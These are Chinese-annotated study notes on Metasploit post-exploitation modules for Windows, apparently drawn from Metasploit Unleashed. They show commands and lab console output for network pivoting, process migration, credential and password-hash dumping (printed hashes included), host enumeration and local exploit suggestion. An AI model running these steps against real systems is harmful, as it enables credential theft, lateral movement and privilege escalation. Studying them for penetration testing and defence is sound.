Metasploit之Post Exploitation

参考：
https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/
https://www.offensive-security.com/metasploit-unleashed/windows-post-manage-modules/

autoroute

这个很重要啊！
The “autoroute” post module creates a new route through a Meterpreter sessions allowing you to pivot deeper into a target network.

meterpreter > run post/windows/manage/autoroute SUBNET=192.168.218.0 ACTION=ADD[*] Running module against V-MAC-XP[*] Adding a route to 192.168.218.0/255.255.255.0...meterpreter > Background session 5? [y/N]  y

之后就可以通过这个路由，来进一步渗透了。

msf exploit(ms08_067_netapi) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > set RHOSTS 192.168.218.0/24RHOSTS => 192.168.218.0/24msf auxiliary(tcp) > set THREADS 50THREADS => 50msf auxiliary(tcp) > set PORTS 445PORTS => 445msf auxiliary(tcp) > run[*] Scanned 027 of 256 hosts (010% complete)[*] Scanned 052 of 256 hosts (020% complete)[*] Scanned 079 of 256 hosts (030% complete)[*] Scanned 103 of 256 hosts (040% complete)[*] Scanned 128 of 256 hosts (050% complete)[*] 192.168.218.136:445 - TCP OPEN[*] Scanned 154 of 256 hosts (060% complete)[*] Scanned 180 of 256 hosts (070% complete)[*] Scanned 210 of 256 hosts (082% complete)[*] Scanned 232 of 256 hosts (090% complete)[*] Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completedmsf auxiliary(tcp) >

migrate

The “migrate” post module will migrate to a specified process or if none is given, will automatically spawn a new process and migrate to it.

meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP[*] Current server process: svchost.exe (1092)[*] Migrating to explorer.exe...[*] Migrating into process ID 672[*] New server process: Explorer.EXE (672)meterpreter >

checkvm(检测是否在虚拟机中)

checks to see if the compromised host is a virtual machine. This module supports Hyper-V, VMWare, VirtualBox, Xen, and QEMU virtual machines.

meterpreter > run post/windows/gather/checkvm [*] Checking if V-MAC-XP is a Virtual Machine .....[*] This is a VMware Virtual Machinemeterpreter >

credential_collector(收集机密信息)

harvests passwords hashes and tokens on the compromised host.

meterpreter > run post/windows/gather/credentials/credential_collector [*] Running module against V-MAC-XP[+] Collecting hashes...    Extracted: Administrator:7bf4f254f224bb24aad3b435b51404ee:2892d23cdf84d7a70e2eb2b9f05c425e    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0    Extracted: HelpAssistant:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714    Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287[+] Collecting tokens...    NT AUTHORITY\LOCAL SERVICE    NT AUTHORITY\NETWORK SERVICE    NT AUTHORITY\SYSTEM    NT AUTHORITY\ANONYMOUS LOGONmeterpreter >

dumplinks(导出存在的快捷方式)

The “dumplinks” module parses the .lnk files in a users Recent Documents which could be useful for further information gathering.Note that, as shown below, we first need to migrate into a user process prior to running the module.

meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP[*] Current server process: svchost.exe (1096)[*] Migrating to explorer.exe...[*] Migrating into process ID 1824[*] New server process: Explorer.EXE (1824)meterpreter > run post/windows/gather/dumplinks [*] Running module against V-MAC-XP[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...[*] Processing: C:\Documents and Settings\Administrator\Recent\developers_guide.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\documentation.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\Local Disk (C).lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\Netlog.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\notes (2).lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\notes.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\Release.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\testmachine_crashie.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\user manual.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\user's guide.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\{33D9A762-90C8-11d0-BD43-00A0C911CE86}_load.lnk.[*] No Recent Office files found for user Administrator. Nothing to do.meterpreter >

enum_applications(列举出安装的应用)

meterpreter > run post/windows/gather/enum_applications [*] Enumerating applications installed on WIN7-X86Installed Applications====================== Name                                                              Version ----                                                              ------- Adobe Flash Player 25 ActiveX                                     25.0.0.148 Google Chrome                                                     58.0.3029.81 Google Update Helper                                              1.3.33.5 Google Update Helper                                              1.3.25.11 Microsoft .NET Framework 4.6.1                                    4.6.01055 Microsoft .NET Framework 4.6.1                                    4.6.01055 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148    9.0.30729.4148 MySQL Connector Net 6.5.4                                         6.5.4 Security Update for Microsoft .NET Framework 4.6.1 (KB3122661)    1 Security Update for Microsoft .NET Framework 4.6.1 (KB3127233)    1 Security Update for Microsoft .NET Framework 4.6.1 (KB3136000v2)  2 Security Update for Microsoft .NET Framework 4.6.1 (KB3142037)    1 Security Update for Microsoft .NET Framework 4.6.1 (KB3143693)    1 Security Update for Microsoft .NET Framework 4.6.1 (KB3164025)    1 Update for Microsoft .NET Framework 4.6.1 (KB3210136)             1 Update for Microsoft .NET Framework 4.6.1 (KB4014553)             1 VMware Tools                                                      10.1.6.5214329 XAMPP 1.8.1-0                                                     1.8.1-0[*] Results stored in: /root/.msf4/loot/20170501172851_pwk_192.168.0.6_host.application_876159.txtmeterpreter >

hashdump

The “hashdump” post module will dump the local users accounts on the compromised host using the registry.

meterpreter > run post/windows/gather/hashdump[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hashes...Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::meterpreter >

usb_history

The “usb_history” module enumerates the USB drive history on the compromised system.

meterpreter > run post/windows/gather/usb_history [*] Running module against V-MAC-XP[*]    C:                                                                Disk ea4cea4c    E:   STORAGE#RemovableMedia#8&3a01dffe&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}   A:   FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}   D:   IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[*] Kingston DataTraveler 2.0 USB Device=====================================================================================   Disk lpftLastWriteTime                       Thu Apr 21 13:09:42 -0600 2011 Volume lpftLastWriteTime                       Thu Apr 21 13:09:43 -0600 2011             Manufacturer                               (Standard disk drives)           ParentIdPrefix                                         8&3a01dffe&0 (   E:)                    Class                                            DiskDrive                   Driver          {4D36E967-E325-11CE-BFC1-08002BE10318}\0001meterpreter >

local_exploit_suggester

查看还有哪些可以exploit的点?

msf > use post/multi/recon/local_exploit_suggester msf post(local_exploit_suggester) > show optionsModule options (post/multi/recon/local_exploit_suggester):   Name             Current Setting  Required  Description   ----             ---------------  --------  -----------   SESSION          2                yes       The session to run this module on.   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploitsmsf post(local_exploit_suggester) > run[*] 192.168.101.129 - Collecting local exploits for x86/windows...[*] 192.168.101.129 - 31 exploit checks are being tried...[+] 192.168.101.129 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.[+] 192.168.101.129 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.[+] 192.168.101.129 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.[+] 192.168.101.129 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.[+] 192.168.101.129 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.[*] Post module execution completed